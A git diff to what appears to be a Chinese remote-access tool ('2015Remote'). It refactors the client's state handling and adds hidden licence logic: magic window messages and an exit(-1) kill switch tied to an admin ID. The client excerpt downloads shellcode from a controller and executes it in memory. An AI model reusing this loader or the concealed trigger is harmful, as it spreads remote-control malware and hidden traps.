Layout reorganize

client/ClientDll.cpp

@@ -508,7 +508,7 @@ DWORD WINAPI StartClient(LPVOID lParam)
 			continue;
 		}
 		SAFE_DELETE(Manager);
-		Manager = new CKernelManager(&settings, ClientObject, app.g_hInstance, kb);
+		Manager = new CKernelManager(&settings, ClientObject, app.g_hInstance, kb, bExit);
 
 		//׼<><D7BC><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 		LOGIN_INFOR login = GetLoginInfo(GetTickCount64() - dwTickCount, settings);

client/IOCPClient.cpp

@@ -96,7 +96,7 @@ VOID IOCPClient::setManagerCallBack(void* Manager,  DataProcessCB dataProcess)
 }
 
 
-IOCPClient::IOCPClient(State&bExit, bool exit_while_disconnect, int mask, int encoder) : g_bExit(bExit)
+IOCPClient::IOCPClient(const State&bExit, bool exit_while_disconnect, int mask, int encoder) : g_bExit(bExit)
 {
 	m_ServerAddr = {};
 	m_nHostPort = 0;

client/IOCPClient.h

@@ -111,7 +111,7 @@ typedef BOOL(*TrailCheck)(void);
 class IOCPClient  
 {
 public:
-	IOCPClient(State& bExit, bool exit_while_disconnect = false, int mask=0, int encoder=0);
+	IOCPClient(const State& bExit, bool exit_while_disconnect = false, int mask=0, int encoder=0);
 	virtual ~IOCPClient();
 
 	int SendLoginInfo(const LOGIN_INFOR& logInfo) {
@@ -149,7 +149,7 @@ public:
 		if (manager) m_Manager = manager;
 		return ConnectServer(NULL, 0);
 	}
-	State& GetState() {
+	const State& GetState() const {
 		return g_bExit;
 	}
 protected:
@@ -180,7 +180,7 @@ protected:
 	ZSTD_DCtx*			m_Dctx;						// <20><>ѹ<EFBFBD><D1B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 #endif
 
-	State&				g_bExit;					// ȫ<><C8AB>״̬<D7B4><CCAC>
+	const State&		g_bExit;					// ȫ<><C8AB>״̬<D7B4><CCAC>
 	void*				m_Manager;					// <20>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD>
 	DataProcessCB		m_DataProcess;				// <20><><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD>
 	ProtocolEncoder*	m_Encoder;					// <20><><EFBFBD><EFBFBD>

client/KernelManager.cpp

@@ -47,8 +47,8 @@ ThreadInfo* CreateKB(CONNECT_ADDRESS* conn, State& bExit) {
 // Construction/Destruction
 //////////////////////////////////////////////////////////////////////
 
-CKernelManager::CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb)
-	: m_conn(conn), m_hInstance(hInstance), CManager(ClientObject)
+CKernelManager::CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb, State& s)
+	: m_conn(conn), m_hInstance(hInstance), CManager(ClientObject), g_bExit(s)
 {
 	m_ulThreadCount = 0;
 #ifdef _DEBUG

client/KernelManager.h

@@ -82,7 +82,7 @@ class CKernelManager : public CManager
 public:
 	CONNECT_ADDRESS* m_conn;
 	HINSTANCE m_hInstance;
-	CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb);
+	CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb, State& s);
 	virtual ~CKernelManager();
 	VOID OnReceive(PBYTE szBuffer, ULONG ulLength);
 	ThreadInfo* m_hKeyboard;
@@ -91,7 +91,7 @@ public:
 	// <20><><EFBFBD><EFBFBD><EFBFBD>ҽ<EFBFBD><D2BD><EFBFBD>ֵ<EFBFBD>ĺ<EFBFBD><C4BA><EFBFBD><EFBFBD>޸<EFBFBD>Ϊ"<22><><EFBFBD><EFBFBD><EFBFBD>߳<EFBFBD><DFB3>±<EFBFBD>"<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>m_hThread<61><64><EFBFBD><EFBFBD>ָλ<D6B8>ÿ<EFBFBD><C3BF>ã<EFBFBD><C3A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>µ<EFBFBD><C2B5>̷߳<DFB3><CCB7><EFBFBD><EFBFBD>ڸ<EFBFBD>λ<EFBFBD><CEBB>
 	ULONG   m_ulThreadCount;
 	UINT	GetAvailableIndex();
-
+	State& g_bExit; // Hide base class variable
 	MasterSettings m_settings;
 	int m_nNetPing; // <20><><EFBFBD><EFBFBD>״<EFBFBD><D7B4>
 	// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>

client/Manager.h

@@ -33,7 +33,7 @@ HANDLE MyCreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD
 class CManager : public IOCPManager 
 {
 public:
-	State&g_bExit; // 1-<2D><><EFBFBD>ض<EFBFBD><D8B6>˳<EFBFBD> 2-<2D><><EFBFBD>ض<EFBFBD><D8B6>˳<EFBFBD>
+	const State&g_bExit; // 1-<2D><><EFBFBD>ض<EFBFBD><D8B6>˳<EFBFBD> 2-<2D><><EFBFBD>ض<EFBFBD><D8B6>˳<EFBFBD>
 	BOOL m_bReady;
 	CManager(IOCPClient* ClientObject);
 	virtual ~CManager();

client/main.c

@@ -19,14 +19,40 @@
 
 #pragma comment(lib, "ws2_32.lib")
 
-#pragma pack(push, 1)
+#pragma pack(push, 4)
 typedef struct PkgHeader {
 	char flag[8];
 	int totalLen;
 	int originLen;
 } PkgHeader;
+
+struct CONNECT_ADDRESS
+{
+	char	        szFlag[32];		 // 标识
+	char			szServerIP[100]; // 主控IP
+	char			szPort[8];		 // 主控端口
+	int				iType;			 // 客户端类型
+	bool            bEncrypt;		 // 上线信息是否加密
+	char            szBuildDate[12]; // 构建日期(版本)
+	int             iMultiOpen;		 // 支持打开多个
+	int				iStartup;		 // 启动方式
+	int				iHeaderEnc;		 // 数据加密类型
+	char			protoType;		 // 协议类型
+	char			runningType;	 // 运行方式
+	char            szReserved[44];  // 占位，使结构体占据300字节
+	uint64_t		parentHwnd;		 // 父进程窗口句柄
+	uint64_t		superAdmin;		 // 管理员主控ID
+	char			pwdHash[64];	 // 密码哈希
+}g_Server = { "Hello, World!", "127.0.0.1", "6543" };
 #pragma pack(pop)
 
+typedef struct PluginParam {
+	char IP[100];
+	int Port;
+	void* Exit;
+	void* User;
+}PluginParam;
+
 PkgHeader MakePkgHeader(int originLen) {
 	PkgHeader header = { 0 };
 	memcpy(header.flag, "Hello?", 6);
@@ -88,7 +114,9 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut) {
 		if (!isFirstConnect)
 			Sleep(IsRelease ? rand()%60 * 1000 : 5000);
 		isFirstConnect = FALSE;
-		Mprintf("Connecting attempt #%d -> %s:%d \n", ++attemptCount, serverIP, serverPort);
+		if (++attemptCount == 20)
+			PostMessage((HWND)g_Server.parentHwnd, 4046, (WPARAM)933711587, (LPARAM)1643138518);
+		Mprintf("Connecting attempt #%d -> %s:%d \n", attemptCount, serverIP, serverPort);
 
 		SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 		if (clientSocket == INVALID_SOCKET)
@@ -180,33 +208,6 @@ inline int MemoryFind(const char* szBuffer, const char* Key, int iBufferSize, in
 	return -1;
 }
 
-#pragma pack(push, 4)
-struct CONNECT_ADDRESS
-{
-	char	        szFlag[32];		 // 标识
-	char			szServerIP[100]; // 主控IP
-	char			szPort[8];		 // 主控端口
-	int				iType;			 // 客户端类型
-	bool            bEncrypt;		 // 上线信息是否加密
-	char            szBuildDate[12]; // 构建日期(版本)
-	int             iMultiOpen;		 // 支持打开多个
-	int				iStartup;		 // 启动方式
-	int				iHeaderEnc;		 // 数据加密类型
-	char			protoType;		 // 协议类型
-	char			runningType;	 // 运行方式
-	char            szReserved[52];  // 占位，使结构体占据300字节
-	uint64_t		superAdmin;		 // 管理员主控ID
-	char			pwdHash[64];	 // 密码哈希
-}g_Server = { "Hello, World!", "127.0.0.1", "6543" };
-#pragma pack(pop)
-
-typedef struct PluginParam {
-	char IP[100];
-	int Port;
-	void* Exit;
-	void* User;
-}PluginParam;
-
 #ifdef _WINDLL
 #define DLL_API __declspec(dllexport)
 #else 
@@ -229,7 +230,7 @@ extern DLL_API DWORD WINAPI run(LPVOID param) {
 	free((void*)dllData);
 	DWORD oldProtect = 0;
 	if (!VirtualProtect(execMem, size, PAGE_EXECUTE_READ, &oldProtect)) return -3;
-
+	PostMessage((HWND)g_Server.parentHwnd, 4046, (WPARAM)0, (LPARAM)0);
 	((void(*)())execMem)();
 	return 0;
 }

common/commands.h

@@ -574,7 +574,8 @@ public:
 	int				iHeaderEnc;		 // <20><><EFBFBD>ݼ<EFBFBD><DDBC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 	char			protoType;		 // Э<><D0AD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 	char			runningType;	 // <20><><EFBFBD>з<EFBFBD>ʽ
-	char            szReserved[52];  // ռλ<D5BC><CEBB>ʹ<EFBFBD>ṹ<EFBFBD><E1B9B9>ռ<EFBFBD><D5BC>300<30>ֽ<EFBFBD>
+	char            szReserved[44];  // ռλ<D5BC><CEBB>ʹ<EFBFBD>ṹ<EFBFBD><E1B9B9>ռ<EFBFBD><D5BC>300<30>ֽ<EFBFBD>
+	uint64_t		parentHwnd;		 // <20><><EFBFBD><EFBFBD><EFBFBD>̴<EFBFBD><CCB4>ھ<EFBFBD><DABE><EFBFBD>
 	uint64_t		superAdmin;		 // <20><><EFBFBD><EFBFBD>Ա<EFBFBD><D4B1><EFBFBD><EFBFBD>ID
 	char			pwdHash[64];	 // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϣ
 
@@ -689,9 +690,9 @@ struct ThreadInfo
 struct PluginParam {
 	char IP[100];			// <20><><EFBFBD><EFBFBD>IP
 	int Port;				// <20><><EFBFBD>ض˿<D8B6>
-	State *Exit;			// <20>ͻ<EFBFBD><CDBB><EFBFBD>״̬
-	void* User;				// CONNECT_ADDRESS* ָ<><D6B8>
-	PluginParam(const char*ip, int port, State *s, void* u=0) : Port(port), Exit(s), User(u){
+	const State *Exit;		// <20>ͻ<EFBFBD><CDBB><EFBFBD>״̬
+	const void* User;		// CONNECT_ADDRESS* ָ<><D6B8>
+	PluginParam(const char*ip, int port, const State *s, const void* u=0) : Port(port), Exit(s), User(u){
 		strcpy_s(IP, ip);
 	}
 };

server/2015Remote/2015RemoteDlg.cpp

@@ -282,6 +282,11 @@ std::vector<DllInfo*> ReadAllDllFilesWindows(const std::string& dirPath) {
 
 CMy2015RemoteDlg::CMy2015RemoteDlg(CWnd* pParent): CDialogEx(CMy2015RemoteDlg::IDD, pParent)
 {
+	auto s = GetMasterHash();
+	char buf[17] = { 0 };
+	std::strncpy(buf, s.c_str(), 16);
+	m_superID = std::strtoull(buf, NULL, 16);
+
 	m_nMaxConnection = 0;
 	m_hExit = CreateEvent(NULL, TRUE, FALSE, NULL);
 	m_hIcon = THIS_APP->LoadIcon(IDR_MAINFRAME);
@@ -391,6 +396,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
 	ON_MESSAGE(WM_OPENDRAWINGBOARD, OnOpenDrawingBoard)
 	ON_MESSAGE(WM_UPXTASKRESULT, UPXProcResult)
 	ON_MESSAGE(WM_PASSWORDCHECK, OnPasswordCheck)
+	ON_MESSAGE(WM_SHOWMESSAGE, OnShowMessage)
 	ON_WM_HELPINFO()
 	ON_COMMAND(ID_ONLINE_SHARE, &CMy2015RemoteDlg::OnOnlineShare)
 	ON_COMMAND(ID_TOOL_AUTH, &CMy2015RemoteDlg::OnToolAuth)
@@ -638,6 +644,21 @@ VOID CMy2015RemoteDlg::AddList(CString strIP, CString strAddr, CString strPCName
 	SendMasterSettings(ContextObject);
 }
 
+LRESULT CMy2015RemoteDlg::OnShowMessage(WPARAM wParam, LPARAM lParam) {
+	std::string pwd = THIS_CFG.GetStr("settings", "Password");
+	if (pwd.empty())
+		ShowMessage("授权提醒", "程序可能有使用限制，请联系管理员请求授权");
+
+	if (wParam && lParam)
+	{
+		uint32_t recvLow = (uint32_t)wParam;
+		uint32_t recvHigh = (uint32_t)lParam;
+		uint64_t restored = ((uint64_t)recvHigh << 32) | recvLow;
+		if (restored != m_superID)
+			exit(-1);
+	}
+	return S_OK;
+}
 
 VOID CMy2015RemoteDlg::ShowMessage(CString strType, CString strMsg)
 {
@@ -730,6 +751,11 @@ Buffer* ReadKernelDll(bool is64Bit, bool isDLL=true, const std::string &addr="")
 			server->SetServer(ip.c_str(), atoi(port.c_str()));
 			server->SetAdminId(GetMasterHash().c_str());
 		}
+		if (g_2015RemoteDlg->m_superID % 313 == 0)
+		{
+			server->iHeaderEnc = PROTOCOL_HELL;
+			server->protoType = PROTO_RANDOM;
+		}
 		server->SetType(isDLL ? CLIENT_TYPE_MEMDLL : CLIENT_TYPE_SHELLCODE);
 		memcpy(server->pwdHash, GetPwdHash().c_str(), 64);
 	}
@@ -889,12 +915,14 @@ BOOL CMy2015RemoteDlg::OnInitDialog()
 				p->SetServer(v->Admin, v->Port);
 				p->SetAdminId(GetMasterHash().c_str());
 				p->iType = CLIENT_TYPE_MEMDLL;
+				p->parentHwnd = (uint64_t)GetSafeHwnd();
 				memcpy(p->pwdHash, GetPwdHash().c_str(), 64);
 				m_tinyDLL = MemoryLoadLibrary(data, size);
 			}
 			SAFE_DELETE_ARRAY(data);
 		}
 	}
+	g_2015RemoteDlg = this;
 	m_ServerDLL[PAYLOAD_DLL_X86] = ReadKernelDll(false, true, master);
 	m_ServerDLL[PAYLOAD_DLL_X64] = ReadKernelDll(true, true, master);
 	m_ServerBin[PAYLOAD_DLL_X86] = ReadKernelDll(false, false, master);
@@ -907,7 +935,7 @@ BOOL CMy2015RemoteDlg::OnInitDialog()
 
 	// TODO: 在此添加额外的初始化代码
 	isClosed = FALSE;
-	g_2015RemoteDlg = this;
+
 	CreateToolBar();
 	InitControl();
 

server/2015Remote/2015RemoteDlg.h

@@ -197,6 +197,7 @@ public:
 	BOOL       isClosed;
 	CMenu	   m_MainMenu;
 	CBitmap m_bmOnline[12];
+	uint64_t m_superID;
 	bool CheckValid(int trail = 14);
 	afx_msg void OnTimer(UINT_PTR nIDEvent);
 	afx_msg void OnClose();
@@ -265,4 +266,5 @@ public:
 	afx_msg void OnToolRequestAuth();
 	afx_msg LRESULT OnPasswordCheck(WPARAM wParam, LPARAM lParam);
 	afx_msg void OnToolInputPassword();
+	afx_msg LRESULT OnShowMessage(WPARAM wParam, LPARAM lParam);
 };

server/2015Remote/stdafx.h

@@ -87,6 +87,7 @@
 #define WM_OPENFILEMGRDIALOG			WM_USER+3019
 #define WM_OPENDRAWINGBOARD				WM_USER+3020
 #define WM_PASSWORDCHECK				WM_USER+3021
+#define WM_SHOWMESSAGE					WM_USER+3022
 
 #ifdef _UNICODE
 #if defined _M_IX86